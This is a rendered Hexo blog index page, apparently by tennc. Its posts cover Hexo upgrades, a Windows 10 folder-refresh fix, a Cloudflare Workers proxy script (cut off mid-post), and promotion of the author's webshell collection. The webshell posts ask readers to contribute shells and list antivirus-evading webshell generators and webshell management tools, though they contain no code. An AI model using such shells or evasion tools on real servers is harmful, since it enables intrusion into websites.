-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathindex.html
1186 lines (711 loc) · 94.8 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>80后小白一枚</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta property="og:type" content="website">
<meta property="og:title" content="80后小白一枚">
<meta property="og:url" content="http://tennc.github.io/index.html">
<meta property="og:site_name" content="80后小白一枚">
<meta property="og:locale">
<meta property="article:author" content="tennc">
<meta name="twitter:card" content="summary">
<link rel="alternative" href="/atom.xml" title="80后小白一枚" type="application/atom+xml">
<link rel="icon" href="/img/favicon.png">
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
<link rel="stylesheet" href="/css/style.css">
<link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
<link rel="apple-touch-icon" href="/apple-touch-icon.png">
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
<!-- 加载特效 -->
<script src="/js/pace.js"></script>
<link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
<script>
var yiliaConfig = {
rootUrl: '/',
fancybox: true,
animate: true,
isHome: true,
isPost: false,
isArchive: false,
isTag: false,
isCategory: false,
open_in_new: false
}
</script>
<meta name="generator" content="Hexo 5.4.0"></head>
<body>
<div id="container">
<div class="left-col">
<div class="overlay"></div>
<div class="intrude-less">
<header id="header" class="inner">
<a href="/" class="profilepic">
<img lazy-src="/img/head.jpg" class="js-avatar">
</a>
<hgroup>
<h1 class="header-author"><a href="/" title="Hi Mate"></a></h1>
</hgroup>
<div id="switch-btn" class="switch-btn">
<div class="icon">
<div class="icon-ctn">
<div class="icon-wrap icon-house" data-idx="0">
<div class="birdhouse"></div>
<div class="birdhouse_holes"></div>
</div>
<div class="icon-wrap icon-ribbon hide" data-idx="1">
<div class="ribbon"></div>
</div>
<div class="icon-wrap icon-link hide" data-idx="2">
<div class="loopback_l"></div>
<div class="loopback_r"></div>
</div>
<div class="icon-wrap icon-me hide" data-idx="3">
<div class="user"></div>
<div class="shoulder"></div>
</div>
</div>
</div>
<div class="tips-box hide">
<div class="tips-arrow"></div>
<ul class="tips-inner">
<li>菜单</li>
<li>标签</li>
<li>友情链接</li>
<li>关于我</li>
</ul>
</div>
</div>
<div id="switch-area" class="switch-area">
<div class="switch-wrap">
<section class="switch-part switch-part1">
<nav class="header-menu">
<ul>
<li><a href="/Home">博客首页</a></li>
<li><a href="/works">作品展示</a></li>
<li><a href="/about">留言打卡</a></li>
<li><a href="/apps">杂项工具</a></li>
</ul>
</nav>
<nav class="header-nav">
<ul class="social">
<a class="fl mail" target="_blank" href="#" title="mail">mail</a>
<a class="fl github" target="_blank" href="https://github.com/tennc" title="github">github</a>
<a class="fl zhihu" target="_blank" href="#" title="zhihu">zhihu</a>
<a class="fl weibo" target="_blank" href="#" title="weibo">weibo</a>
<a class="fl google" target="_blank" href="#" title="google">google</a>
<a class="fl twitter" target="_blank" href="#" title="twitter">twitter</a>
<a class="fl linkedin" target="_blank" href="#" title="linkedin">linkedin</a>
</ul>
</nav>
</section>
<section class="switch-part switch-part2">
<div class="widget tagcloud" id="js-tagcloud">
<a href="/tags/0708/" style="font-size: 10px;">0708</a> <a href="/tags/789/" style="font-size: 10px;">789</a> <a href="/tags/Pentesting-Cheatsheets/" style="font-size: 10px;">Pentesting Cheatsheets</a> <a href="/tags/Typroa/" style="font-size: 10px;">Typroa</a> <a href="/tags/V-p-n/" style="font-size: 10px;">V(*)p(*)n</a> <a href="/tags/asm/" style="font-size: 10px;">asm</a> <a href="/tags/bluekeep/" style="font-size: 10px;">bluekeep</a> <a href="/tags/cloudflare/" style="font-size: 10px;">cloudflare</a> <a href="/tags/crack/" style="font-size: 20px;">crack</a> <a href="/tags/create-file/" style="font-size: 10px;">create file</a> <a href="/tags/cve-2019-0708/" style="font-size: 10px;">cve-2019-0708</a> <a href="/tags/github/" style="font-size: 10px;">github</a> <a href="/tags/good-Cheatsheets/" style="font-size: 10px;">good Cheatsheets</a> <a href="/tags/hexo/" style="font-size: 10px;">hexo</a> <a href="/tags/red/" style="font-size: 10px;">red</a> <a href="/tags/redteam/" style="font-size: 10px;">redteam</a> <a href="/tags/webshell/" style="font-size: 10px;">webshell</a> <a href="/tags/win-10-create-file-refresh/" style="font-size: 10px;">win 10 create file refresh</a> <a href="/tags/windows10/" style="font-size: 10px;">windows10</a> <a href="/tags/%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/" style="font-size: 10px;">常用命令</a> <a href="/tags/%E6%9D%82%E8%B0%88/" style="font-size: 10px;">杂谈</a> <a href="/tags/%E9%97%B2%E8%81%8A/" style="font-size: 10px;">闲聊</a> <a href="/tags/%E9%9A%8F%E7%AC%94/" style="font-size: 10px;">随笔</a>
</div>
</section>
<section class="switch-part switch-part3">
<div id="js-friends">
<a target="_blank" class="main-nav-link switch-friends-link" href="http://tennc.github.io/">name</a>
</div>
</section>
<section class="switch-part switch-part4">
<div id="js-aboutme">80后,愣娃一枚。</div>
</section>
</div>
</div>
</header>
</div>
</div>
<div class="mid-col">
<nav id="mobile-nav">
<div class="overlay">
<div class="slider-trigger"></div>
<h1 class="header-author js-mobile-header hide"><a href="/" title="Me"></a></h1>
</div>
<div class="intrude-less">
<header id="header" class="inner">
<a href="/" class="profilepic">
<img lazy-src="/img/head.jpg" class="js-avatar">
</a>
<hgroup>
<h1 class="header-author"><a href="/" title="Me"></a></h1>
</hgroup>
<nav class="header-menu">
<ul>
<li><a href="/Home">博客首页</a></li>
<li><a href="/works">作品展示</a></li>
<li><a href="/about">留言打卡</a></li>
<li><a href="/apps">杂项工具</a></li>
<div class="clearfix"></div>
</ul>
</nav>
<nav class="header-nav">
<div class="social">
<a class="mail" target="_blank" href="#" title="mail">mail</a>
<a class="github" target="_blank" href="https://github.com/tennc" title="github">github</a>
<a class="zhihu" target="_blank" href="#" title="zhihu">zhihu</a>
<a class="weibo" target="_blank" href="#" title="weibo">weibo</a>
<a class="google" target="_blank" href="#" title="google">google</a>
<a class="twitter" target="_blank" href="#" title="twitter">twitter</a>
<a class="linkedin" target="_blank" href="#" title="linkedin">linkedin</a>
</div>
</nav>
</header>
</div>
</nav>
<div class="body-wrap">
<article id="post-upgrade-hexo小记" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="/2021/06/05/upgrade-hexo%E5%B0%8F%E8%AE%B0/" class="article-date">
<time datetime="2021-06-05T07:31:10.000Z" itemprop="datePublished">2021-06-05</time>
</a>
</div>
<div class="article-inner">
<input type="hidden" class="isFancy" />
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="/2021/06/05/upgrade-hexo%E5%B0%8F%E8%AE%B0/">upgrade hexo小记</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>更新一下blog</p>
<p>常年不更新,再次更新一下,看了看自己的<code>hexo</code>版本,尴尬啊,最新的hexo版本已经5.X了,而我的还是3.X。故GG之,看看如何能无损更新hexo版本,并成功发布此篇文章。</p>
<p>一顿操作猛如虎,直接gg之,给出连接地址<a target="_blank" rel="noopener" href="https://lanvnal.com/2020/02/16/hexo-ban-ben-sheng-ji/">Hexo版本升级指南</a></p>
<h3 id="升级"><a href="#升级" class="headerlink" title="升级"></a>升级</h3><p>1、全局升级hexo-cli,先<code>hexo version</code>查看当前版本,然后<code>npm i hexo-cli -g</code>,再次<code>hexo version</code>查看是否升级成功。</p>
<p>2、使用<code>npm install -g npm-check</code>和<code>npm-check</code>,检查系统中的插件是否有升级的,可以看到自己前面都安装了那些插件</p>
<p>3、使用<code>npm install -g npm-upgrade</code>和<code>npm-upgrade</code>,升级系统中的插件</p>
<p>4、使用<code>npm update -g</code>和<code>npm update --save</code></p>
<p><img src="/resources/image-20210605155142172.png" alt="image-20210605155142172"></p>
<h3 id="报错"><a href="#报错" class="headerlink" title="报错"></a>报错</h3><p>升级成功后,出现报错提示<code>Cannot find module 'through'</code>,根据提示让尝试运行<code>rm -rf node_modules && npm install --force</code>,待运行结束,运行<code>hexo version</code>,输出正常。</p>
<h3 id="开始写文档"><a href="#开始写文档" class="headerlink" title="开始写文档"></a>开始写文档</h3><p><code>hexo new "文章标题"</code>默认生成一篇文章</p>
<p>用Typora来写,写好之后保存</p>
<p>运行命令<code>hexo s -g</code>,生成文章,并打开本地预览</p>
<p>打开网页 <a target="_blank" rel="noopener" href="http://localhost:4000/">localhost:4000/</a></p>
<p>正常访问,样式文章也都正常。</p>
<p>运行命令<code>hexo d -g</code>,生成文章并部署到 <a target="_blank" rel="noopener" href="https://github.com/">github</a></p>
<p><code>SUCCESS</code> </p>
</div>
<div class="article-info article-info-index">
<div class="clearfix"></div>
</div>
</div>
</article>
<article id="post-windows10-新建文件夹需要刷新才显示的处理办法" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="/2020/03/12/windows10-%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9%E9%9C%80%E8%A6%81%E5%88%B7%E6%96%B0%E6%89%8D%E6%98%BE%E7%A4%BA%E7%9A%84%E5%A4%84%E7%90%86%E5%8A%9E%E6%B3%95/" class="article-date">
<time datetime="2020-03-12T01:48:55.000Z" itemprop="datePublished">2020-03-12</time>
</a>
</div>
<div class="article-inner">
<input type="hidden" class="isFancy" />
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="/2020/03/12/windows10-%E6%96%B0%E5%BB%BA%E6%96%87%E4%BB%B6%E5%A4%B9%E9%9C%80%E8%A6%81%E5%88%B7%E6%96%B0%E6%89%8D%E6%98%BE%E7%A4%BA%E7%9A%84%E5%A4%84%E7%90%86%E5%8A%9E%E6%B3%95/">windows10 新建文件夹需要刷新才显示的处理办法</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>不晓得从何时起,windows10 新建文件夹和文件后不手动刷新时,就不显示,也不知道是不是win10的bug,故搜索一圈,留个备份,忘有类似的问题都可以来解决。</p>
<ol>
<li><p>首先再管理员模式下运行命令:</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dism /online /Cleanup<span class="literal">-Image</span> /StartComponentCleanup</span><br></pre></td></tr></table></figure>
<p><img src="/resources/Snipaste_2020-03-12_01.jpg" alt="Snipaste_2020-03-12_01"></p>
</li>
</ol>
<ol start="2">
<li><p>运行扫描系统命令:</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sfc /scannow</span><br></pre></td></tr></table></figure>
<p><img src="/resources/Snipaste_2020-03-12_02.jpg" alt="Snipaste_2020-03-12_02"></p>
</li>
<li><p>之后运行下列命令:</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dism /Online /Cleanup<span class="literal">-Image</span> /RestoreHealth</span><br></pre></td></tr></table></figure>
<p><img src="/resources/Snipaste_2020-03-12_03.jpg" alt="Snipaste_2020-03-12_03"></p>
</li>
<li><p>最后再运行一次扫描系统:</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sfc /scannow</span><br></pre></td></tr></table></figure>
<p><img src="/resources/Snipaste_2020-03-12_04.jpg" alt="Snipaste_2020-03-12_04"></p>
</li>
<li><p>重启系统。</p>
</li>
</ol>
<p>以上命令是依次运行,上一条结束之后,再运行下一条。<br>本文参考文章:</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/ttcttcttc/article/details/79685868?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task">win10在资源管理器创建、删除文件,修改文件名。需刷新才更新问题</a></p>
</div>
<div class="article-info article-info-index">
<div class="article-category tagcloud">
<a class="article-category-link" href="/categories/win10/">win10</a>
</div>
<div class="article-tag tagcloud">
<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/create-file/" rel="tag">create file</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/win-10-create-file-refresh/" rel="tag">win 10 create file refresh</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/windows10/" rel="tag">windows10</a></li></ul>
</div>
<div class="clearfix"></div>
</div>
</div>
</article>
<article id="post-webshell-project" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="/2020/02/21/webshell-project/" class="article-date">
<time datetime="2020-02-21T03:47:52.000Z" itemprop="datePublished">2020-02-21</time>
</a>
</div>
<div class="article-inner">
<input type="hidden" class="isFancy" />
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="/2020/02/21/webshell-project/">webshell project</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<h3 id="webshell"><a href="#webshell" class="headerlink" title="webshell"></a>webshell</h3><p>This project has started 5.3K. </p>
<p>Searching <a target="_blank" rel="noopener" href="https://github.com/tennc/webshell">webshell</a> on <a target="_blank" rel="noopener" href="https://github.com/">github</a> is the number one project.</p>
<p>This is a <a target="_blank" rel="noopener" href="https://github.com/tennc/webshell">webshell</a> collection project to give people roses, and you have the fragrance. If you downloaded this project, please also submit your shell.<br>This project covers a variety of commonly used scripts such as: asp, aspx, php, jsp, pl, py</p>
<p>This kind of webshell, please do not change the name and password. </p>
<p>Note: All shells do not guarantee the existence of backdoors, but they will never be deliberately added by backdoors. </p>
<p>Do not add backdoors. If you find backdoor code, please issue. </p>
<p>The tools provided by this project are prohibited from engaging in illegal activities. This project is for testing only, and all the consequences caused by it are not relevant to me.</p>
<p>Extending a project:</p>
<ul>
<li>webshell-venom </li>
<li>Unlimited Killing Webshell</li>
<li>Unlimited Generation Tool </li>
<li>Unwanted Killing Webshell Unlimited Generation Tool </li>
</ul>
<p>Other webshell project (old):</p>
<ol>
<li>xl7dev/WebShell</li>
<li>JohnTroony/php-webshells</li>
<li>BlackArch/webshells</li>
<li>LandGrey/webshell-detect-bypass</li>
<li>JoyChou93/webshell</li>
<li>bartblaze/PHP-backdoors</li>
<li>WangYihang/Webshell-Sniper</li>
</ol>
<p>By the way, a wave of website management tools:</p>
<ol>
<li><p>Cknife</p>
</li>
<li><p>Altman</p>
</li>
<li><p>xise</p>
</li>
<li><p>Weevely</p>
</li>
<li><p>quasibot</p>
</li>
<li><p>Webshell-Sniper</p>
</li>
<li><p>antsword</p>
</li>
<li><p>ice scorpion</p>
</li>
<li><p>webacoo</p>
</li>
</ol>
<p>above in no particular order<br>Author: tennc <a href="http://tennc.github.io/webshell">http://tennc.github.io/webshell</a><br>license: <a target="_blank" rel="noopener" href="https://github.com/tennc/webshell/blob/master/license">GPL v3</a><br>Download link Check github releases.<br>Latest: <a target="_blank" rel="noopener" href="https://github.com/tennc/webshell/releases">https://github.com/tennc/webshell/releases</a></p>
<p>Thanks to <a target="_blank" rel="noopener" href="https://www.cloudflare.com/">cloudflare</a> for sponsoring open source services</p>
</div>
<div class="article-info article-info-index">
<div class="article-category tagcloud">
<a class="article-category-link" href="/categories/webshell/">webshell</a>
</div>
<div class="article-tag tagcloud">
<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/cloudflare/" rel="tag">cloudflare</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/webshell/" rel="tag">webshell</a></li></ul>
</div>
<div class="clearfix"></div>
</div>
</div>
</article>
<article id="post-webshell-start-突破5k" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="/2019/10/18/webshell-start-%E7%AA%81%E7%A0%B45k/" class="article-date">
<time datetime="2019-10-18T07:00:49.000Z" itemprop="datePublished">2019-10-18</time>
</a>
</div>
<div class="article-inner">
<input type="hidden" class="isFancy" />
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="/2019/10/18/webshell-start-%E7%AA%81%E7%A0%B45k/">webshell start 突破5k</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>经过多年,webshell的start终于突破到了5000+,不容易.</p>
<p>不作恶,是根本.不忘初心,方得始终.</p>
<p>但是这么多年来,很少收到合并推送.</p>
<p>无语呀,而我自己也没有什么渠道来进行webshell的收集,有一些能收集webshell的大佬们,如果你们从我这个项目获得了一些webshell,也希望你们能反哺一下这个项目.</p>
<p>毕竟,独木难支.众人拾柴才能火焰高.</p>
<p>期待更多的大佬能分享一下webshell</p>
</div>
<div class="article-info article-info-index">
<div class="article-category tagcloud">
<a class="article-category-link" href="/categories/%E6%9D%82%E8%B0%88/">杂谈</a>
</div>
<div class="article-tag tagcloud">
<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E6%9D%82%E8%B0%88/" rel="tag">杂谈</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E9%97%B2%E8%81%8A/" rel="tag">闲聊</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E9%9A%8F%E7%AC%94/" rel="tag">随笔</a></li></ul>
</div>
<div class="clearfix"></div>
</div>
</div>
</article>
<article id="post-用CloudFlare-Workers搭建baidu镜像站" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="/2019/09/25/%E7%94%A8CloudFlare-Workers%E6%90%AD%E5%BB%BAbaidu%E9%95%9C%E5%83%8F%E7%AB%99/" class="article-date">
<time datetime="2019-09-25T07:32:56.000Z" itemprop="datePublished">2019-09-25</time>
</a>
</div>
<div class="article-inner">
<input type="hidden" class="isFancy" />
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="/2019/09/25/%E7%94%A8CloudFlare-Workers%E6%90%AD%E5%BB%BAbaidu%E9%95%9C%E5%83%8F%E7%AB%99/">用CloudFlare Workers搭建baidu镜像站</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>不多说开始搭建吧</p>
<p>从网上搜到了利用 cloudflare workers 来搭建一个网站的镜像。</p>
<p>链接:<a target="_blank" rel="noopener" href="https://vxy.xyz/CF-WorkersProxy.html">简单几步用Cloudflare Workers搭建WorkersProxy加速任意网站</a></p>
<p>代码:</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// List of domains bind to your WorkersProxy.</span></span><br><span class="line"><span class="keyword">const</span> domain_list = [<span class="string">'https://你的cloudflareWorker应用地址/'</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">// Website you intended to retrieve for users.</span></span><br><span class="line"><span class="keyword">const</span> upstream = <span class="string">'https://需要加速的网站的地址/'</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Website you intended to retrieve for users using mobile devices.</span></span><br><span class="line"><span class="keyword">const</span> upstream_mobile = <span class="string">'https://需要加速的网站移动端的地址/'</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Countries and regions where you wish to suspend your service.</span></span><br><span class="line"><span class="keyword">const</span> blocked_region = []</span><br><span class="line"></span><br><span class="line"><span class="comment">// IP addresses which you wish to block from using your service.</span></span><br><span class="line"><span class="keyword">const</span> blocked_ip_address = [<span class="string">'0.0.0.0'</span>, <span class="string">'10.0.0.0'</span>]</span><br><span class="line"></span><br><span class="line">addEventListener(<span class="string">'fetch'</span>, <span class="function"><span class="params">event</span> =></span> {</span><br><span class="line"> event.respondWith(fetchAndApply(event.request));</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="keyword">async</span> <span class="function"><span class="keyword">function</span> <span class="title">fetchAndApply</span>(<span class="params">request</span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">const</span> region = request.headers.get(<span class="string">'cf-ipcountry'</span>).toUpperCase();</span><br><span class="line"> <span class="keyword">const</span> ip_address = request.headers.get(<span class="string">'cf-connecting-ip'</span>);</span><br><span class="line"> <span class="keyword">const</span> user_agent = request.headers.get(<span class="string">'user-agent'</span>);</span><br><span class="line"> <span class="keyword">let</span> response = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">let</span> url = request.url;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">await</span> device_status(user_agent)){</span><br><span class="line"> upstream_domain = upstream</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> upstream_domain = upstream_mobile</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">let</span> domain <span class="keyword">of</span> domain_list) {</span><br><span class="line"> url = url.replace(domain, upstream_domain)</span><br><span class="line"> };</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (blocked_region.includes(region)) {</span><br><span class="line"> response = <span class="keyword">new</span> Response(<span class="string">'Access denied: WorkersProxy is not available in your region yet.'</span>, {</span><br><span class="line"> <span class="attr">status</span>: <span class="number">403</span></span><br><span class="line"> });</span><br><span class="line"> } <span class="keyword">else</span> <span class="keyword">if</span>(blocked_ip_address.includes(ip_address)){</span><br><span class="line"> response = <span class="keyword">new</span> Response(<span class="string">'Access denied: Your IP address is blocked by WorkersProxy.'</span>, {</span><br><span class="line"> <span class="attr">status</span>: <span class="number">403</span></span><br><span class="line"> });</span><br><span class="line"> } <span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">let</span> method = request.method;</span><br><span class="line"> <span class="keyword">let</span> headers = request.headers;</span><br><span class="line"> response = fetch(url, {</span><br><span class="line"> <span class="attr">method</span>: method,</span><br><span class="line"> <span class="attr">headers</span>: headers</span><br><span class="line"> })</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> response;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">async</span> <span class="function"><span class="keyword">function</span> <span class="title">device_status</span> (<span class="params">userAgentInfo</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> Agents = [<span class="string">"Android"</span>, <span class="string">"iPhone"</span>, <span class="string">"SymbianOS"</span>, <span class="string">"Windows Phone"</span>, <span class="string">"iPad"</span>, <span class="string">"iPod"</span>];</span><br><span class="line"> <span class="keyword">var</span> flag = <span class="literal">true</span>;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> v = <span class="number">0</span>; v < Agents.length; v++) {</span><br><span class="line"> <span class="keyword">if</span> (userAgentInfo.indexOf(Agents[v]) > <span class="number">0</span>) {</span><br><span class="line"> flag = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> flag;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>我在<a target="_blank" rel="noopener" href="https://gist.github.com/d05f3f26417b1a22dcb33fbb7a013af6">gist.github.com</a> 在备份一份,免得丢失。</p>
<p>主要就是修改第31行和第32行,改成自己相应的网址就好。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// List of domains bind to your WorkersProxy.</span></span><br><span class="line"><span class="keyword">const</span> domain_list = [<span class="string">'https://你的cloudflareWorker应用地址/'</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">// Website you intended to retrieve for users.</span></span><br><span class="line"><span class="keyword">const</span> upstream = <span class="string">'https://需要加速的网站的地址/'</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Website you intended to retrieve for users using mobile devices.</span></span><br><span class="line"><span class="keyword">const</span> upstream_mobile = <span class="string">'https://需要加速的网站移动端的地址/'</span></span><br></pre></td></tr></table></figure>
<p>改成下面的:</p>
